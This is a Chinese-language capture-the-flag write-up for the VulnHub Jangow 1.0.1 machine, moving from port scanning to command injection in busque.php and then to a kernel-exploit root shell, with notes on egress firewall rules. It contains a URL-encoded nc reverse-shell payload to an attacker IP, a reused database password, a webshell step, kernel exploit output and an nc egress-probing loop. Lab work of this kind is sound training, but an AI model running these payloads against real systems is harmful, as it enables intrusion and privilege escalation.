打靶记录(一四七)之VulnHubJangow1.0.1

端口扫描

┌──(mikannse㉿kali)-[~]
└─$ sudo nmap --min-rate=10000 -p- 192.168.56.118
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 19:07 CST
Nmap scan report for jangow.hub (192.168.56.118)
Host is up (0.00043s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
MAC Address: 08:00:27:9F:53:41 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.40 seconds

┌──(mikannse㉿kali)-[~]
└─$ sudo nmap -sT -sC -sV -O -p21,80 192.168.56.118
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 19:08 CST
Nmap scan report for jangow.hub (192.168.56.118)
Host is up (0.00067s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.18
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2021-06-10 18:05  site/
|_
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Index of /
MAC Address: 08:00:27:9F:53:41 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.16 - 4.6 (97%), Linux 3.2 - 4.9 (97%), Linux 4.4 (97%), Linux 3.13 (94%), Linux 4.2 (94%), Linux 3.13 - 3.16 (91%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (91%), Linux 4.10 (91%), Linux 5.1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: 127.0.0.1; OS: Unix

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.45 seconds

Web

┌──(mikannse㉿kali)-[~/vulnhub/jangow]
└─$ feroxbuster -u http://jangow.hub/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x rar,php,zip,sql,txt,html,bak,pdf --filter-status 404 -k
                                                                                                     
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.4
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://jangow.hub/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
 💢  Status Code Filters   │ [404]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.4
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [rar, php, zip, sql, txt, html, bak, pdf]
 🏁  HTTP methods          │ [GET]
 🔓  Insecure              │ true
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      272c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      307c http://jangow.hub/site => http://jangow.hub/site/
200      GET      106l      659w    26989c http://jangow.hub/site/assets/img/demo-image-01.jpg
200      GET       54l      134w     1644c http://jangow.hub/site/js/scripts.js
200      GET        8l       29w    28898c http://jangow.hub/site/assets/favicon.ico
200      GET      679l     4637w   425261c http://jangow.hub/site/assets/img/ipad.png
200      GET    11253l    21663w   207746c http://jangow.hub/site/css/styles.css
200      GET        1l        0w        1c http://jangow.hub/site/busque.php
200      GET      949l     4824w   385662c http://jangow.hub/site/assets/img/bg-masthead.jpg
200      GET      492l     2733w   186437c http://jangow.hub/site/assets/img/demo-image-02.jpg
301      GET        9l       28w      314c http://jangow.hub/site/assets => http://jangow.hub/site/assets/
301      GET        9l       28w      311c http://jangow.hub/site/css => http://jangow.hub/site/css/
301      GET        9l       28w      317c http://jangow.hub/site/wordpress => http://jangow.hub/site/wordpress/
200      GET      173l      663w    10190c http://jangow.hub/site/index.html
200      GET     2608l    13994w   956051c http://jangow.hub/site/assets/img/bg-signup.jpg
301      GET        9l       28w      310c http://jangow.hub/site/js => http://jangow.hub/site/js/
200      GET      173l      663w    10190c http://jangow.hub/site/wordpress/index.html
200      GET        1l       10w       87c http://jangow.hub/site/wordpress/config.php

发现busque.php能够任意命令执行，做个反弹shell

http://jangow.hub/site/busque.php?buscar=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%20192.168.56.131%20443%20%3E%2Ftmp%2Ff

提权

在config.php能找到数据库账号密码，但是连接不上的

<?php
$servername = "localhost";
$database = "desafio02";
$username = "desafio02";
$password = "abygurl69";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
// Check connection
if (!$conn) {
    die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
mysqli_close($conn);
?>

但这个密码是jangow01用户的

www-data@jangow01:/var/www/html/site/wordpress$ su jangow01
su jangow01
Password: abygurl69

枚举了一下之后没有别的路径，尝试内核提权,uname -a看到linux内核版本为4.4.031，利用: https://github.com/chacka0101/exploits/blob/master/45010.c

但是发现本地开启的web服务器访问不到

于是写一个webshell,使用蚁剑连接来上传文件,在靶机上编译然后执行,提权成功

www-data@jangow01:/tmp$ gcc 45010.c -o hack1
gcc 45010.c -o hack1
www-data@jangow01:/tmp$ chmod +x hack1
chmod +x hack1
www-data@jangow01:/tmp$ ./hack1
./hack1
[.] 
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.] 
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.] 
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff88003c4da300
[*] Leaking sock struct from ffff88003c11bc00
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff880035073180
[*] UID from cred structure: 33, matches the current: 33
[*] hammering cred structure at ffff880035073180
[*] credentials patched, launching shell...
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# 

BeyondROOT

在打的时候，发现本机的许多端口靶机都访问不了，猜测是因为设置了防火墙出口策略,用iptables看一下出口的策略链

# iptables -L OUTPUT --line-numbers
iptables -L OUTPUT --line-numbers
Chain OUTPUT (policy DROP)
num  target     prot opt source               destination         
1    ufw-before-logging-output  all  --  anywhere             anywhere            
2    ufw-before-output  all  --  anywhere             anywhere            
3    ufw-after-output  all  --  anywhere             anywhere            
4    ufw-after-logging-output  all  --  anywhere             anywhere            
5    ufw-reject-output  all  --  anywhere             anywhere            
6    ufw-track-output  all  --  anywhere             anywhere

查看用户自定义策略,发现只允许的出站流量为https,所以反弹shell也只能监听443

# iptables -L ufw-user-output --line-numbers
iptables -L ufw-user-output --line-numbers
Chain ufw-user-output (1 references)
num  target     prot opt source               destination         
1    ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:https
2    ACCEPT     udp  --  anywhere             anywhere             udp dpt:https

那么在实战环境中，如何探测允许的出站目标端口，可采用:

在攻击机上，将所有的端口绑定在一个端口上，那么其他主机发往其他端口的流量都会转发到这个端口上

sudo iptables -A PREROUTING -t nat -p tcp --dport 1:65565 -j REDIRECT --to-port 6688。

在目标机器上运行如下bash脚本，能够访问的端口会打印出来

for i in {400..450};
do
    timeout 1 nc -vz attack_ip $i && echo "$i allowed" >> result.txt || echo "$i refused" >> result.txt;
done

还有一开始在内核提权时失败了，提示核心数量应当大于等于二，原理可能是因为使用的是条件竞争来提权，所以搭建靶机的时候设置CPU数量应当大于等于2

碎碎念

因为防火墙的原因卡了非常久，尝试了各种传文件的方式最后还是选择了用蚁剑,这叫做Easy难度的房间???